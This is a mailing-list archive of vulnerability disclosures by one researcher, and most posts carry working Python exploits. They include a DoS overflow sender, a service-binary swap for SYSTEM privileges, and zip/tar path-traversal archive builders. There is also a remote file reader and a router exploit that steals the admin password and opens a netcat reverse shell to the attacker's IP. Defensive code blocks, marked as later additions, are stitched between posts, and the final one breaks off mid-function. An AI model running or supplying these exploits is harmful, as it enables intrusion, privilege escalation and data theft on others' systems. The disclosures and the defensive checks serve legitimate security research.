[FD] Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)

2016-12-09 Thread Rio Sherri
# Date : 07/12/2016
# Author : R-73eN
# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
# Vendor : http://dhcp-dns-server.sourceforge.net/
# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
# Vulnerability Description:
# The software crashes when it tries to write to an invalid address.
#
# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
# MOV DWORD PTR SS:[ESP+4],31
# MOV DWORD PTR SS:[ESP],1
# .
# MOV DWORD PTR DS:[EBX+24],EAX -> Here the corruption happens: EAX fails to move to EBX, which is our controlled address + 24 bytes.
#
# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7).
# Even if we try to put some valid pointers to manipulate the execution flow we can't, because every address in DualServ.exe
# contains 00, which is a badchar in our case.
#

import socket
import time
import sys

banner = "\n\n"
banner +="  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

host = ""
port = 6789

def send_request(host,port,data):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		s.connect((host,port))
		s.send(data)
		print "[+] Malicious Packet Sent [+]\n"
		
	except Exception:
		print "[+] Exploit failed . . .[+]\n"
	s.close()

	

ebx = ""
eax = ""
evil = "A" * 497 + eax + "" + ebx + "D" * 400

if len(sys.argv) < 2:
	print '\n Usage : exploit.py ipaddress\n'
	exit(0)
else:
	host = sys.argv[1]

# The method doesn't really matter; the request only gets validated on its length.
request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"
send_request(host,port,request.replace("{REPLACE}",evil))


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Eagle Speed USB MODEM SOFTWARE Privilege Escalation

2016-12-01 Thread Rio Sherri
# Vulnerability Description:
# When the Eagle Speed software is installed, a service with the name ZDServ is installed.
# The service itself has the right permissions, which do not allow reconfiguring the binary,
# but the path of the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
#TYPE   : 110  WIN32_OWN_PROCESS (interactive)
#START_TYPE : 2   AUTO_START
#ERROR_CONTROL  : 1   NORMAL
#BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
#LOAD_ORDER_GROUP   :
#TAG: 0
#DISPLAY_NAME   : ZDServ
#DEPENDENCIES   :
#SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <--- Everyone has full permissions.
#   NT AUTHORITY\SYSTEM:(I)(F)
#   BUILTIN\Administrators:(I)(F)
#  Victim-PC\lowpriv:(I)(F)
#   BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#
Exploit is attached.
#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN 
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)

import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +="  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner


if len(sys.argv) < 2:
	print '\n Usage : exploit.py program.exe\n'
	print 'https://infogen.al/'
else:
	program = sys.argv[1]
	if not os.path.isfile(program):
		print "[-] The parameter was incorrect, use a correct filename [-]"
		exit(0)
	if not os.path.isfile(path):
		print "[-] File not found, probably the service doesn't exist [-]\n"
	else:
		print "[+] Backing up the binary [+]"
		os.system(file_move)
		print "[+] Copying the payload [+]"
		os.system("copy " + program + " " + path)
		if filecmp.cmp(program,path):
			print "[+] Exploit successful, wait for the service to restart or reboot [+]"
		else:
			print "[-] Exploit failed [-]"
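A defender-side audit of the service binary's ACL, as an added example that is not part of the original post: it parses icacls output (the listing below is the one quoted in the advisory, re-typed as constructed test input) and reports any low-privilege principal holding write-capable rights on the file. The set of low-privilege principals and the right codes treated as write-capable are assumptions drawn from icacls' documented output format.

```python
import re

# Constructed test input: the icacls listing quoted in the advisory above,
# re-typed here so the example runs offline.
SAMPLE_ICACLS = r"""C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F)
                                           NT AUTHORITY\SYSTEM:(I)(F)
                                           BUILTIN\Administrators:(I)(F)
                                           Victim-PC\lowpriv:(I)(F)
                                           BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_PATH = r"C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"

# Principals every local user belongs to (assumed list, compared case-insensitively).
# Write access for any of these lets an unprivileged user replace the binary.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls simple rights that imply modify/replace (F = full, M = modify, W = write)
# and the specific-rights codes that also allow changing the file's contents or ACL.
WRITE_SIMPLE_RIGHTS = {"F", "M", "W"}
WRITE_SPECIFIC_RIGHTS = {"WD", "AD", "D", "DC", "WDAC", "WO"}

ACE_TOKEN_RE = re.compile(r"\(([^)]*)\)")


def parse_icacls(text, file_path):
    """Return [(principal, [right tokens])] for one file's icacls listing.

    The first output line carries the file path before the first ACE; the
    remaining ACEs are indented continuation lines.
    """
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(file_path):
            line = line[len(file_path):].strip()
        if ":(" not in line:          # summary line, blank line, or bare path
            continue
        principal, _, rights = line.rpartition(":(")
        tokens = ACE_TOKEN_RE.findall("(" + rights)
        aces.append((principal, tokens))
    return aces


def ace_allows_write(tokens):
    """True if any right in the ACE lets the holder alter or replace the file."""
    for token in tokens:
        for right in token.split(","):   # specific rights appear as "(RX,WD)"
            if right in WRITE_SIMPLE_RIGHTS or right in WRITE_SPECIFIC_RIGHTS:
                return True
    return False


def writable_by_low_priv(text, file_path):
    """Low-privilege principals that can overwrite the given binary."""
    return [
        principal
        for principal, tokens in parse_icacls(text, file_path)
        if principal.lower() in LOW_PRIV_PRINCIPALS and ace_allows_write(tokens)
    ]


if __name__ == "__main__":
    for principal in writable_by_low_priv(SAMPLE_ICACLS, SAMPLE_PATH):
        print("WRITABLE by low-privilege principal %s: %s" % (principal, SAMPLE_PATH))
```

The same function can be run over `icacls` output for every service's BINARY_PATH_NAME to find other binaries in the same state.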



[FD] Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)

2016-11-09 Thread Rio Sherri
# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released an updated version which fixes the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response.
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file, it doesn't check for " ../ "
# characters, which makes it possible to do a path traversal and write anywhere in the system.
# Vulnerability Replication
# 1. Create a specially crafted zip file with the python script attached.
# 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\
# 3. You can change the directory, go to startup and when the user reboots the script will get executed, or you can write a malicious dll to a program directory or
# system32 directory which will get loaded and we gain remote command execution.
# 4. Open avira free antivirus
# 5. Go to update -> Manual Update
# 6. Select the malicious file
# 7. Directory traversal was successful
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# POC: 

#!/usr/bin/python -w
banner = ""
banner += "  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

import zipfile, sys


if len(sys.argv) != 2:
	print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
	print "[+] Example: python exploit.py test.txt"
	exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print "[+] Created xvdf_fusebundle.zip successfully [+]"

# Fix:
# Update to the latest version.

[FD] Billion Router 7700NR4 Remote Root Command Execution

2016-10-11 Thread Rio Sherri
# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is widely used here in Albania. It is given by a telecom provider to home and business users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
# credentials we don't have too much access, but because of the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to the telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
# Exploit attached.


import requests
import base64
import socket
import time

host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +="  _____ __  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner


# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip  + ' 1337 0backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'

def execute_payload(password):
	print "[+] Please run nc -lvp 1337 and then press any key [+]"
	raw_input()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,23))
	s.recv(1024)
	s.send("admin\r")
	a= s.recv(1024)
	time.sleep(1)
	s.send(password +"\r")
	time.sleep(1)
	s.recv(1024)
	s.send(evil + "\r")
	time.sleep(1)
	print "[+] If everything worked you should get a reverse shell [+]"
	print "[+] Warning pressing any key will close the SHELL [+]"
	raw_input()




r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
	print "[+] Seems the exploit worked [+]"
	print "[+] Dumping data . . . [+]"
	temp = r.text
	admin_pass = temp.split("")[1].split("")[0]
#	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
	execute_payload(str(base64.b64decode(admin_pass)))
else:
	print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"


[FD] KeepNote 0.7.8 Remote Command Execution

2016-09-29 Thread Rio Sherri
# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en
# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7)
# Software : http://keepnote.org/index.shtml#download
# Vendor : ~
#
# DESCRIPTION:
#
# When KeepNote imports a backup, which is actually a tar.gz file, it doesn't check for " ../ " characters,
# which makes it possible to do a path traversal and write anywhere in the system (where the user has write permissions).
# This simple POC will write the file test.txt to /home/root/.bashrc to get command execution when bash is run.
# There are a lot of ways but I chose this just for demonstration purposes, and it's supposed we run the keepnote application
# as root (default in kali linux, where this bug was tested).
#
#


banner = ""
banner +="  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

import tarfile, sys

if len(sys.argv) != 2:
	print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
	print "[+] Example: python exploit.py test.txt"
	exit(0)
print "[+] Creating Exploit File [+]"

filename = "KeepNoteBackup.tar.gz"

path = "../../../../../../../home/root/.bashrc"

tf = tarfile.open(filename,"w:gz")
tf.add(sys.argv[1], path)
tf.close()

print "[+] Created KeepNoteBackup.tar.gz successfully [+]"



[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal

2016-09-28 Thread Rio Sherri
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# DESCRIPTION:
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
# Vendor Advisory and Fix: 
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
The problem lies in the package kavachart-kcServlet-5.3.2.jar, file com/ve/kavachart/servlet/ChartStream.java.
The vulnerable code is:

    extends HttpServlet {
        public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
            block6 : {
                try {
                    // Taking parameter "sn" and writing it to the "string" variable
                    String string = httpServletRequest.getParameter("sn");

                    if (string == null) break block6;
                    String string2 = string.substring(string.length() - 3);

                    // The string variable is passed here without any sanitization for directory traversal,
                    // and you can successfully use this to do a directory traversal.
                    byte[] arrby = (byte[])this.getServletContext().getAttribute(string);

                    if (arrby != null) {
                        httpServletResponse.setContentType("image/" + string2);
                        ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                        httpServletResponse.setContentLength(arrby.length);
                        servletOutputStream.write(arrby);
                        this.getServletContext().removeAttribute(string);
                        break block6;
                    }

POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib



[FD] Unrar 0.0.1 Memory Corruption

2016-09-08 Thread Rio Sherri
# Title : Unrar 0.0.1 Memory Corruption
# Date : 05/09/2016
# Author : R-73eN
# Tested on : Linux VM 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 2011 i686 i686 i386 GNU/Linux
# Software : https://github.com/defiant-labs/unrar-free

root@VM:~/unrar-free/src# unrar --version
unrar 0.0.1
root@VM:~/unrar-free/src# gdb --args ./unrar ~/test.rar
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /root/unrar-free/src/unrar...done.
(gdb) run
Starting program: /root/unrar-free/src/unrar /root/test.rar

unrar 0.0.1  Copyright (C) 2004  Ben Asselstine, Jeroen Dekkers


Extracting from /root/test.rar


Program received signal SIGSEGV, Segmentation fault.
0x08050e2e in DecodeNumber (Deco=0x8066c20) at unrarlib.c:1653
1653  if (N < Deco->DecodeLen[8])


The document that crashes the unrar is attached.


crash.rar
Description: application/rar


[FD] runAV mod_security Remote Command Execution

2016-05-13 Thread Rio Sherri
# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
# https://www.infogen.al/



#include "common.h"

main(int argc, char *argv[])
{
    char cmd[MAX_OUTPUT_SIZE];
    char output[MAX_OUTPUT_SIZE];
    int error;
    char *colon;
    char *keyword;

    if (argc > 1) {
        sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
        output[0] = '\0';
        error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);

        + OTHER CODE +


The argv[1] parameter is passed unsanitized to a sprintf function which sends 
the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14

POC:

snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
-rw-rw-r--  1 snort snort0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ 
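The sprintf-into-a-shell-string bug beside its two fixes, as an added example that is not taken from runAV: /bin/echo stands in for clamscan so the three variants run offline, and a constructed filename of the same shape as the PoC above shows which variant lets the shell run a second command. The function names, the stand-in scanner and the availability of a POSIX /bin/sh are assumptions.

```python
import shlex
import subprocess

# Offline stand-in for /usr/bin/clamscan: /bin/echo just prints its arguments,
# which is enough to show how the filename reaches the program.
# Assumes a POSIX /bin/sh and /bin/echo are present.
SCANNER = "/bin/echo"
# Constructed filename with the same shape as the "foo.php;touch /tmp/pwn3d" PoC.
INJECTED_NAME = "foo.php;echo INJECTED"


def scan_via_shell_string(filename):
    """The runAV pattern: sprintf() the name into one string handed to a shell."""
    cmd = "%s --no-summary %s" % (SCANNER, filename)
    proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout.splitlines()


def scan_via_quoted_shell_string(filename):
    """If a shell must be used: quote the argument so metacharacters stay literal."""
    cmd = "%s --no-summary %s" % (SCANNER, shlex.quote(filename))
    proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout.splitlines()


def scan_via_argv(filename):
    """Preferred fix: an argument vector, so nothing parses the name as shell syntax."""
    proc = subprocess.run([SCANNER, "--no-summary", filename],
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def looks_like_injection(filename):
    """Cheap detection for logs: shell metacharacters in a name bound for a scanner."""
    return any(ch in filename for ch in ";|&`$()<>\n")


if __name__ == "__main__":
    print("shell string :", scan_via_shell_string(INJECTED_NAME))
    print("quoted string:", scan_via_quoted_shell_string(INJECTED_NAME))
    print("argv         :", scan_via_argv(INJECTED_NAME))
```

The first call prints a second line, INJECTED, because the shell split the command at the semicolon; the other two hand the whole name to the scanner as one argument.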

[FD] Express Zip <= 2.40 Path Traversal

2016-04-08 Thread Rio Sherri
#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition, in this case C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o

#Banner
banner = ""
banner += "  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

import zipfile, sys


if len(sys.argv) != 2:
	print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
	print "[+] Example: python exploit.py test.txt"
	exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("evil.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
zf.close()
print "[+] Created evil.zip successfully [+]"
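A defensive extraction check for the archive path-traversal pattern shared by the Avira, KeepNote and Express Zip posts above, as an added example that is not part of any of those posts: it builds constructed archives carrying the same entry names as the PoCs, refuses any entry whose normalised path leaves the destination directory (and any tar link entry), and extracts only a clean archive. The function names and sample file names are assumptions.

```python
import io
import os
import tarfile
import tempfile
import zipfile

# Entry names copied from the PoCs above (Windows-style and POSIX-style traversal).
ZIP_TRAVERSAL_NAME = "..\\..\\..\\..\\..\\..\\..\\..\\test.bat"
TAR_TRAVERSAL_NAME = "../../../../../../../home/root/.bashrc"


class UnsafeArchiveMember(ValueError):
    """An archive entry would land outside the extraction directory."""


def resolve_member_path(dest_dir, member_name):
    """Return the absolute path an entry would be written to, or raise.
    Backslashes count as separators (the Windows extractors honour them); absolute
    and drive-qualified names are refused; the normalised target must stay under dest_dir."""
    name = member_name.replace("\\", "/")
    if not name or name.startswith("/") or os.path.splitdrive(name)[0]:
        raise UnsafeArchiveMember("absolute or drive-qualified name: %r" % member_name)
    base = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(base, name))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:              # different drives on Windows
        inside = False
    if not inside:
        raise UnsafeArchiveMember("escapes destination: %r" % member_name)
    return target


def unsafe_members(archive_path, dest_dir):
    """Names of entries (zip or tar.gz) that would escape dest_dir."""
    bad, names = [], []
    if zipfile.is_zipfile(archive_path):
        with zipfile.ZipFile(archive_path) as zf:
            names = zf.namelist()
    else:
        with tarfile.open(archive_path) as tf:
            for member in tf.getmembers():
                if member.issym() or member.islnk():
                    bad.append(member.name)   # links can redirect later writes
                else:
                    names.append(member.name)
    for name in names:
        try:
            resolve_member_path(dest_dir, name)
        except UnsafeArchiveMember:
            bad.append(name)
    return bad


def safe_extract(archive_path, dest_dir):
    """Extract only if every entry passed the check; refuse the whole archive otherwise."""
    bad = unsafe_members(archive_path, dest_dir)
    if bad:
        raise UnsafeArchiveMember("refusing to extract, unsafe entries: %s" % ", ".join(bad))
    if zipfile.is_zipfile(archive_path):
        with zipfile.ZipFile(archive_path) as zf:
            zf.extractall(dest_dir)
    else:
        with tarfile.open(archive_path) as tf:
            tf.extractall(dest_dir)
    return True


def build_samples(workdir):
    """Write three constructed archives shaped like the PoCs; return their paths."""
    payload = b"echo constructed sample\n"
    paths = {"zip_traversal": os.path.join(workdir, "xvdf_fusebundle.zip"),
             "tar_traversal": os.path.join(workdir, "KeepNoteBackup.tar.gz"),
             "zip_ok": os.path.join(workdir, "notes.zip")}
    with zipfile.ZipFile(paths["zip_traversal"], "w") as zf:   # Avira / Express Zip shape
        zf.writestr(ZIP_TRAVERSAL_NAME, payload)
    with tarfile.open(paths["tar_traversal"], "w:gz") as tf:   # KeepNote shape
        info = tarfile.TarInfo(TAR_TRAVERSAL_NAME)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    with zipfile.ZipFile(paths["zip_ok"], "w") as zf:          # benign control
        zf.writestr("notes/readme.txt", payload)
    return paths


def demo():
    """Run the check against the samples in a scratch directory and report."""
    with tempfile.TemporaryDirectory() as work:
        paths = build_samples(work)
        dest = os.path.join(work, "extract")
        os.mkdir(dest)
        report = {key: unsafe_members(path, dest) for key, path in paths.items()}
        report["ok_extracted"] = safe_extract(paths["zip_ok"], dest)
        report["ok_file_present"] = os.path.isfile(os.path.join(dest, "notes", "readme.txt"))
        return report
```

Calling demo() lists both traversal entries as unsafe and shows the benign archive extracting normally; the check is done on the whole archive before anything is written, so a single bad entry aborts the import.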

[FD] Apple Software Update 2.1.3 (Windows) Remote Command Execution.

2016-02-03 Thread Rio Sherri
Apple Software Update is a utility to update Apple software on Windows machines. The update process uses this kind of architecture.
First the software makes a request to
http://swcatalog.apple.com/content/catalogs/others/index-windows-1.sucatalog
This returns an xml file containing the urls of ".dist" files, and there were some more interesting things

key>Packages


URL

http://swcdn.apple.com/content/downloads/61/34/061-8153/WgWXrHyJVmFn9KrXRg3w2XPXNFXxhnZFS6/BootCampUpdate32.msp

.
.
.
.


MSP is a file extension for a Windows Installer patch file format used by Windows and Microsoft programs,
typically for bug fixes, security updates and hotfixes. Since the program connects with the host in plain
text http, we can use a MITM attack and modify the response and the link to a malicious .msp, and we get a remote command execution.

There are even .exe files

.
.
.
URL
string>
http://swcdn.apple.com/content/downloads/21/23/061-4512/BKYTZyKmtNr5wpxQCTy9f8xDSYPZ5MTGf4/BCLocUpdateEnable.exe

.
.
.

Apart from this if we take a look at the .dist file the program uses XML
files. It has options for urls,arch, etc etc
An example:
http://swcdn.apple.com/content/downloads/42/17/031-43074/ts4e9jo3pe732xq8ghsq504uye3x1dt7az/031-43074.English.dist
Has the following content










BootCampUpdate32.msp

.
.
.
.
.

It has a "rtf" file content which is run when the installation begins (which can lead to exploitation of Word bugs).
It has a html file content which is run through the IE Scripting Engine (which can lead to exploitation of Internet Explorer bugs).

The other interesting thing is


AppleApplicationSupport.msi
QuickTime.msi
QuickTime.msi
QuickTimeInstallerAdmin.exe


Basically these are the commands that get executed throughout the installation.
So modifying this response through a MITM, adding an argument as below
From:
QuickTime.msi
To:
QuickTime.msi

Our command executes.

Rio Sherri
Infogen AL



[FD] EasyCafe Server <= 2.2.14 Remote File Read

2015-12-26 Thread Rio Sherri
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload a file from the server to a client.
# And the request is as follows. EasyCafe Server sends a UDP request to the client with the file that it wants to upload,
# then the client receives the packet, connects to the server on port 831, sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and retrieve a file, because the server doesn't validate the request
# and does not check if it has sent the UDP request, which gives us full read access to the system.

POC is attached.
#!/usr/bin/python -w

import socket
#Banner
banner = ""
banner += "  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner



IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) 
+ end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
data = s.recv(261) # Get header
while data:
data = s.recv(2048)
print data

except Exception:
print "[+] https://www.infogen.al/ [+]"
finally:
s.close()
___
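The root cause described in the advisory above is that the data channel on port 831 never checks that the server itself initiated the transfer. As an added example (not EasyCafe's code, and not its real wire protocol), the following Python sketches the server-side guard that closes that gap: the announcement step hands out a one-time token bound to a client and to one canonicalised path under an export root, and the data channel returns bytes only for a request that presents a matching, unused token. The export directory, file and client addresses are constructed for the demo.

```python
import os
import secrets
import tempfile
from typing import Dict, Optional, Tuple


class TransferBroker:
    """Server side of a push-style file transfer, written so the data
    channel only honours requests that the server itself initiated.

    Assumed design (not EasyCafe's protocol): the announcement carries a
    one-time token, and the client must present it on the data channel.
    """

    def __init__(self, export_root: str) -> None:
        self.export_root = os.path.realpath(export_root)
        # token -> (client address, absolute path that was offered)
        self._pending: Dict[str, Tuple[str, str]] = {}

    def _resolve(self, relative_path: str) -> str:
        """Canonicalise a path and refuse anything outside export_root."""
        full = os.path.realpath(os.path.join(self.export_root, relative_path))
        if os.path.commonpath([self.export_root, full]) != self.export_root:
            raise ValueError("path escapes the export root")
        return full

    def offer(self, client_ip: str, relative_path: str) -> str:
        """Announcement step: remember what was offered, and to whom."""
        full = self._resolve(relative_path)
        token = secrets.token_hex(16)
        self._pending[token] = (client_ip, full)
        return token

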